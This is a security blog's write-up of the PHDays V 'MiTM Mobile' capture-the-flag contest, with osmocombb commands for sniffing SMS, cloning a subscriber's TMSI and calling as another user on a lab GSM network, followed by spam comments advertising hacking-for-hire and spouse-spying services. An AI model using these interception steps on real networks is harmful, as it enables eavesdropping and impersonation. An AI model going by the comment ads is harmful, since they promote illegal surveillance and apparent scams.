How much does it take to hack a mobile network?
Is electronic government secure
in the era of WikiLeaks and Anonymous?

Is SCADA hacking a Hollywood fiction
or the nowadays reality?
Internet banking: is there any chance to win
over the fraudsters?

Cyber-crimes, cyber-espionage, cyber-war: where do we draw a borderline?


Friday, July 3, 2015

The MiTM Mobile Contest: GSM Network Down at PHDays V

Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks having only a 10$ cell phone with some hacker freeware.

Contest conditions and technologies
You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000. 
2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords. 
3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have the access. 
There are other numbers in the network through which some employees get important information, but, unfortunately, we failed to find them. Besides, don't forget — you can always come across someone's private information in the corporate network.
The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.

We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.

So, it's all clear with the operator's trappings, let's now look at the network implementation. Our hardware solution was a device with a simple name — UmTRX (the manufacturer's site: The network's wireless part was based on this unit. The functionality of the base station and GSM (software part) was implemented through the Osmocom/OpenBTS stack.

UmTRX is the heart of MiTM Mobile.

We also ordered SIM cards for a simple and quick network registration. The MiTM Mobile network credentials were specified in them, and the card data were registered in the network. In order to simplify air tapping and make the life of the players easier we disabled data encryption in our network (A5/0). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). All this, including the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on the part of another user.

Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.

Review of Tasks

Some theory at first:

  • IMSI — International Mobile Subscriber Identity stored in SIM-card. 
  • MSISDN — Mobile subscriber ISDN number phone number, assigned to IMSI in operator’s infrastructure
  • TMSI — Temporary Mobile Subscriber Identity randomly assigned by the network to every mobile in the area, the moment it is switched on.

IMSI is the magic number specified in the SIM card. It looks something like this — 250-01-ХХХХХХХХХХ, where 250 is the country code (Russia), 01 is the operator code (MTS), and ХХХХХХХХХХ is a unique ID. A subscriber is identified and authorized in the operator's network by the IMSI.

In this case, we have the sysmocim SIM card with 901 country code, 70 operator code, and 0000005625 subscriber's ID in the operator's network (see fig.).

The second thing you need to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's base, and not on the SIM card. During the call, the base station puts this number according to the IMSI <--> MSISDN conversion table (MSC/VLR has this function in the real network). Or it doesn't (in case of an anonymous call).

TMSI is a 4-byte temporary identifier given to the subscriber after the authorization.

Now that we know this, let's continue.

We need to run the osmocombb stack. The actions are quite simple. You need to connect the cable to the computer and forward it inside the virtual machine. A device named /dev/ttyUSB0 should appear there. After that, you should connect a TURNED-OFF cell phone to the cable through an audio jack.

Then you open two consoles. In the first one, you must run the following command:

#~/osmocom-bb-master/src/host/osmocon/osmocon  -p /dev/ttyUSB0  -m c123xor  -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin

Now press the red button of the cell phone to turn it on. This command starts uploading firmware into the phone and opening the socket that will be a mediator between the phone and the programs. It is the so-called layer 1 of the OSI model. It establishes physical interaction with the network.

This is roughly what layer1 outputs to the console after it has been uploaded into the phone (this is not something of interest, though).

In the second console, you must run the following command:

#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan  -a 774  -i

This command establishes layer 2-3 of the OSI model, namely — air tapping in search of CCCH (Common Control Channel) packages.

774 is ARFCN we broadcast at. Yea, nobody needs to look for the channel of our operator. We did everything we could to make your life easier, our dear participants :)

-i is the interface you will send the packages to.

Now, you launch Wireshark. It will do everything for you — for instance, it will gather all the necessary packages in SMS, unparce the TPDU/PDU format, and show everything easy to read.

Remember, you were to intercept SMS for the first task. In order to make browsing in Wireshark more convenient and keep our screen "clean", you should set the filter at gsm_sms packages.

Now you can see SMS messages on the air. Congrats, you've completed the first task! If you were now at PHDays V, you would be able to see the SMS message containing the code for getting publes. The code was being aired constantly during the two days, every five minutes, an even at night.

You must run layer1 again for the second task (or you can just keep it on after the previous one).

In the second console, you run the following command as layer2-3:

#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i

Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, you must open the third console and run

$ telnet 4247

A Cisco-like interface will open. You must enable the extended mode:

OsmocomBB> enable

After that, you should display the list of commands available:

OsmocomBB# list

What do you think the clone command does? Well, its name speaks for itself – you can clone a subscriber. In the description of the command, you can see it accepts TMSI as an argument. If you manage to find out the victim's TMSI and put in our phone, you will be able to connect to the network instead of the initial subscriber.

During the whole conference, we were trying to send an SMS message to a phone number missing in the network. IF a participant would put the TMSI requested by the base station as the clone command parameter, he or she would get the flag with the code for money.

OsmocomBB# clone 1 5cce0f7f

It was quite easy to see the base station request to the subscriber. You could look for gsmtap packages in Wireshark with the Paging Requests Type 1 request (the request the base station makes when a call is originated).

Alternatively, you could use the second console that has mobile launched:

After you type the TMSI, you will get an SMS message intended for the initial subscriber.

Now you have enough information for the third task. Here, you have to pretend to be another subscriber as in the previous task. You know his number, but not TMSI. What can you do? It's easy: you just have to send an SMS message to the subscriber or call him to the number 77777. You will see the base station requests to the 77777 subscriber as in the last example. Note: you must use another cell phone for the call or SMS; otherwise, your Motorola won't see the base station's broadcast requests intended for the target subscriber.

After that, you need to put the TMSi into your phone by means of the clone command and make a call to the precious number!

OsmocomBB# call 1 2000

Now you take Motorola and listen to the code. If the participants have done everything right, they will hear it, otherwise — a joke will be the sole thing they get :)

Additionally, there were SMS messages in the network that informed about a new voice message received. If the participants hadn't been lazy and had opened the phone book of the device, they would have seen the number of the voice mail. If you call this number, you can hear insider information — data about increase and decrease in the rate of MiTM Mobile shares.

The fourth task was connected not quite with GSM, but with vulnerable SIM cards used for getting access to the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting — "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for searching vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So, you need to plug the SIM card into the phone, connect it to your computer and start the search. After a couple of minutes, you can analyze the data obtained:

Apart from lots of apps disclosing information enough for key brute forcing, you've been provided with a "red" application, which doesn't demand any secret keys for accessing. Let's analyse it separately:

The last two bytes of the SIM card reply are the status bytes, where, for instance, 0x9000 means that the command has been completed successfully. In this case, you get 0x9124, which means there are 36 bytes the card wants to return to us. Let's change the program code a little and see, what kind of data it is.

After decoding, you will get:

>>> ‘D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')
'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'

You need to brute force all the possible CLAs and INSs for the instructions sent in the binary SMS message — and you will get the flag:

>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')
'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'

That's it, as far as the tasks are concerned.

Contest winners and surprises

All the PHDays participants could try hand at the MiTM Mobile contest together with the CTF teams: those who wished to take part were provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.

However, the only one who managed to intercept the SMS message in the middle of the first day was Gleb Cherbov, who ultimately became the contest winner.

Only the More Smoked Leet Chicken team managed to complete three tasks by the beginning of the second day. The fourth task was available only for the CTF participants, but everybody failed it.

The forum visitors could notice that LTE and 3G were missing occasionally, and sometimes the network was not available if you come close to the zone with the GSM jammers that looked like this:

Some people were getting messages from the number 74957440144 (or from an anonymous one) with the text "SMS_from_bank" or some other "harmless spam". It was connected with the operation of the MiTm Mobile network.

Also, some "luckers" got the following message by the end of the second day:

This joke has nothing to do with MiTM Mobile functioning, but it reminds everyone once again of general safety rules. Watch out for your pet phone, which suddenly starts finding the MosMetro_Free network (free WiFi network in Moscow underground) in a place where it shouldn't be, connects to it, and lots of programs get loose into a trap. Some of them use the phone number as an identifier. The attacker can get this number and then sends the messages out through the SMS gateway to all the "luckers".

P.S. Here are the details about the network components for all those who would like to make a contest similar to our MitM Mobile.

The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the manuals concerning the configuration can be found at or You may also use a ready-made solution from UmTRX — UmDESK, it has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.

You can find an image of the osmocombb stack here (we highly recommend you to have VMWare 11). This build is enough for experimenting. SIM cards are not necessary, but you have to get a cell phone and any USB-UART cable.

You could choose any cell phone from the list:

And, yes, you can find PL2303 and FT232 almost everywhere. Unsoldering a 2.5 mini-jack is piece of cake.

You can order SIM cards and the cable here:

Such as
USB-UART (CP2102):
SIM cards:

You can find cell phones on Ebay, buy in pedestrian underpasses, or order in China: on average, you will spend 10$ per phone.

We want to express special gratitude to the guys from Fairwaves (they are the ones who make UmTRX, UmDESK, UmROCKET, and etc.) for consulting and the equipment provided for testing. They do a GREAT thing! And also, special thanks to Ivan.


  1. Really good post.It is just what I was looking for and quite thorough as well. Thanks for posting this, I saw a couple other similar posts
    but yours was the best so far. The ideas are strongly pointed out and clearly emphasized. Best essay writing service


      I am COREY RODRIGUEZ by name, THE CEO of protocol & cyber-sheild hackers.
      In this message, we will explain how you can almost avoid SCAMMERS and stay safe, plus how our organisation works.

      Read it carefully!!
      Its reading will not take more than 10mins.

      We kindly URGE you to not respond without have read the entire text. Those who mail without have read everything, ask questions that are answered here!!

      It tears me up when we receive bitter emails for Jobs with complains from most clients with hacking issues about past SCAMs by uncertified fake hackers like most you see here, which is disappointingly inadequate, leaving their mess for us to deal with eventually (WE DON'T MEAN TO BRAG ABOUT THAT).


      You won't know until you fall a Victim but can be attentive to potential danger, error or harm if you take note of these:

      1, you see uncertified email accounts carrying numberings like
      pls flee from them, BIG SCAMMERS.
      They take your money and never do your job!!

      2, you see posts like "do you need to spy on spouse?"
      All fake! , just a way to lure you toward getting ripped OFF!.

      3, posting fake testimonies and comments to trick you into feeling save and secured.
      Pls endeavour to ignore!!

      4,beware as we urge you not to make respond to any "IVAN HONG" (impersonating with our post pretending to work for us) with this exact post.


      For years now, We've helped organisations secure data base, so many sites has been hacked for different reasons of Job kinds.
      and in short timing hacked petty cyber sites accounts like Skype, Fb, WhatsApp,Tinder,Twitter!!, FLIPPED MONEY, LOAD CCs and vice versa but these are significant experiences a good and effectively recognized organisation
      must firmly ascertain.

      ◾OUR "AIMS" HERE ◾
      1◾to assign a qualified agent of specific rank to particularly any sort of cyber issues you intend dealing with in short and accurate timing.

      2◾ to screen in real hackers (gurus only) in need of job with or without a degree, to speed up the availability of time given to for Job contracts.!!

      Thus an online binary decoding exam will be set for those who seeks employment under the teams Establishment.

      write us on:
      ◾ or

      COREY ROD,
      Thank you!!!

  2. Conducting the mobile contests like MiTM Mobile Contest is good. This will be a good platform to the customers to buy the most modern mobile phones and also easier way to find the upcoming phone models also and also the latest brands too- research paper writing service

  3. The MITM mobile contest will be a best platform to update latest news about the mobiles and also new mobile technologies. We all know the influence of mobile in our daily life, so lose the opportunity. thesis writing service reviews

  4. An experienced hacker can easily do cell phone tracking, SIM card tracking etc. Ordinary people have no great idea about the tricks used in hacking and they don't even think about these kinds of activities. This MiTM mobile contest is like an awareness program for people who have no idea about hacking. Custom essay writing service

  5. The MiTM mobile contest is really fabulous so that people who are not aware of hacking can easily know about this in detail. Only experienced people could do this since they have deeper knowledge in this area. dissertation writing service reviews

  6. I recommend you look at this site, if you have problems with your essay writing -

    1. If you need to hire a real hacker to help spy on your partner's cell phone remotely, change your grades or boost your credit score. Contact this helpline 347.857.7580 or the email address

  7. The MITM mobile contest will be a best platform to update latest news about the mobiles and also new mobile technologies
    Send Flowers To Japan

  8. I strongly recommend the service of a GREAT Hacker to you and his email is I have used him quite a number of times and he has never disappointed me.

    He does all types of mobile hacks, get unrestricted and unnoticeable access to your partner/spouse, Skype, Facebook Account, Email(s), Whatsapp, Instagram, Text messages, Twitter, Bank accounts, office files etc.

    Getting the job done is as simple as sending an email to stating what you want to do.

  9. Hello,be warned, most of these so called hackers here are impostors, I know how real hackers work, they never advertise themselves in such a credulous manner and they are always discrete. I’ve been ripped off so many times out of desperation trying to find urgent help until my friend finally introduced me to a reliable hacker who works with Proof, discretion and delivers, he does all sorts of hacks but he helped me hack my cheating boyfriend email/facebook,I have made him my permanent hacker and you can as well enjoy his services. You can contact him at mitchbourne (@) cyberservices . com and after his work also endeavor to spread the good news on his work and how he helped you, Just tell him Miss Kniffen referred you.

  10. If you are good at hacking you can easily back any mobile phone but we cannot easily use SIM card cracking. In our county there many legal procedures…

  11. Wow! This is real good site for the readers as the content in this sites is very informative and it makes us pleasure to read the whole content. Gifts To Pakistan

  12. I wonder what is the oldest gadget in this pile?

  13. Interesting post! This is really helpful for me. I like it! Thanks for sharing!
    dissertation Writing Service

  14. It is for the first that I just visited your site and I find it really interesting! Congratulations! Custom Essay Writing Service

  15. Thanks on your marvelous posting! I quite enjoyed reading it, you can be a great author. I will be sure to bookmark your blog and will often come. Write My Essays

  16. Get Online Assignment Help SG Service in Singapore at cheapest price by expert writers of Students Assignment help. Even students can get highly marks in their exam because we provide you quality assignment that will 100% help you to increase your academic performance.


  17. I was introduced to SPYNETPROFESSONALHACKERS@GMAIL.COM because i really wanted to know what my husband has been up to lately as
    I seem not to be getting his attention.He was able to hack into my husband’s Facebook, Snapchat, WhatsApp, Instagram and
    above all gave me full access to his
    mobile phone remotely and emails. I couldn't help but to introduce him to those who
    have their spouse cheating on them and want to spy on them- SPYNETPROFESSONALHACKERS@GMAIL.COM ...
    I’m very sure he will help you out with any hack related issues, tell him I referred you..thank me later

  18. Your sharing of this content is very interesting. I like it very much. Hopefully I will be able to read more post from you. How to Write A+ Essays

  19. Hello everyone, was interesting to read your article. Usually i'm reading New York Times , but now i will read you too! (

  20. * Level Seven Hacker Group *
    We are a group of experienced WHITE HAT HACKERS. We do all types of hacking like
    - Keylogger
    - Denial of Service (DoS\DDoS)
    - Waterhole attacks
    - Fake WAP
    - Eavesdropping (Passive Attacks)
    - Phishing
    - Virus, Trojan etc.
    - ClickJacking Attacks
    - Cookie theft
    - Bait and switch
    - any email
    - phone spy
    - network sniffing
    - database hacking
    - change of grades (for any school)
    - Clear criminal records
    - any social media account
    - Android hack
    - iOS hack
    - credit score hack
    - Retrieval of lost documents
    - Hack into companies
    - Hack CCTV
    - DUIs
    and many more.
    Contact us at
    Phone Number & Whatsapp +1(732) 639-1527

    for any of your hacking needs. Come to us with your problem and we will help you solve them in less than 3 days.

  21. I'm a Certified Hacking and Security (CHS) Expert, that needs no further explanation. You can reach me on my email above if you need quick access to a cheating partner's phone, text messages, facebook account, whatsapp account, email accounts and any other social media accounts and I'll send you an estimate within few hours as well as info on manner of working.
    I also use my skill sets to help binary options scam victims recover their lost funds and also to help boost/fix credit scores under a space of one week.

    "The only thing to do with good advice is to pass it on. It is never of any use to oneself"
    Oscar Wilde

  22. This is really a nice post, that you have updated us with all of nice information that can be very useful for future... Send Gifts To pakistan

  23. This internet site is my intake , real good layout and perfect subject material . The Sims Mobile Hack

  24. I remember my experience with hackers i contacted online, i almost lost hope in finding out if my husband was loyal to me and has been loyal in our 20 years marriage, i lost a lot of funds in paying these so called hackers so i made up my mind that if i get scammed again i'll just forget about finding out what God doesn't want me to know, Then i saw reviews about ( mikejosh@cyber-wizard DOT com ) and decided contact him and if and if i hear any stupid excuse won't contact anybody and just accept that God doesn't want me to then he proved to me that he isn't a cheat by working a sample job for me but to my greatest surprise he did the job and sent results to me fast, i was so happy but sad part was i divorced my husband, and i will drop an advise for people who wants any kind of hacking services stopped being scammed by people who impersonate being hackers, contact ( mikejosh@cyber-wizard DOT com ) for a fast and clean job. Thank me later.

  25. Well written descriptive post. I was searching for it since past 5 days.Thanks for sharing it. Read interesting article on Classic Bollywood Movies 1960

  26. For any health consultation and treatment visit Dynamic Homeopath

  27. Bast My Website New Movie All Site Free Download